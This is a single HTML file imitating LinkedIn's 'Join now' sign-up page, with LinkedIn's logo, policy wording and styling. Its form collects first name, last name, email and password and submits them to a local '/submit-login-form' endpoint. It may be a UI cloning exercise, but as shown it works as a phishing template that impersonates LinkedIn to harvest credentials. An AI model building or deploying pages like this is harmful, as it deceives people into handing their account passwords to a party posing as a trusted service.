<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width,height=device-height, initial-scale=1.0">
<link rel="stylesheet" href="linkedin.css" type="text/css">

<link href='https://fonts.googleapis.com/css?family=Encode Sans Semi Expanded' rel='stylesheet'>

<style>
  
  h2{
    
    text-align: center;
    font-family: sans-serif;
  }
  body{
    background-color: rgb(2,26,31);
  }
  .grey_background_color{
    background-color: rgb(64,64,64);
  }
  .white_text{
    color:white;
  }
  h5{
    text-align: center;
  }
  .blue{
    background-color: #0066FF;
  }
  mark { 
    background-color: #0066FF;
    color: white;
    padding-top: 1px;
    padding-left: 1px;
    padding-bottom:1px;
    padding-right: 1px;
    margin: 3px;
    border-radius: 10%;
}
  input{
    border: none;
    background: transparent;
    width:100%;
    height:30px;
  }
  #center{
    text-align: center;
  }
  #a{
    height: 40px;
    margin-bottom: -18px;
color:black;
background-color:white;
border:1px solid white;
  }
  #b{
    background-color: #0066FF;
    border-color:#0066FF;
    width:100%;
    border:none;
    height:40px;
  }
</style>
  </head>
  <body>
<div class="blue_background_color">
  <h2>
    <img src="https://static.licdn.com/sc/h/95o6rrc5ws6mlw6wqzy0xgj7y">
  </h2>
  </div>
<div class="grey_background_color">
  <h5 class="white_text">Join to view full profiles for free</h5>


<form action="/submit-login-form">
   <div id="a"><input id="a"type="text" align="right" width="48" height="48" placeholder="First Name" required></div><br>
  <div id="a"><input id="a"type="text" placeholder="Last Name" required></div><br>
  <input id="a" type="text" placeholder="Email" required><br><br>
  <input id="a"type="text" placeholder="Password(6 or more characters)" required><br><br>
  <p id="center" class="white_text">By clicking Join now, you agree to the LinkedIn <strong>User Agreement, Privacy Policy, </strong> and <strong> Cookie Policy.</strong></p>
  <button id="b" type="submit" class="white_text blue_background_color"><strong>Join Now</strong></button>
</form>
  
</div>
<p id="center" class="white_text">Already have an account?<strong>Sign in</strong></p>
  </body>
</html>

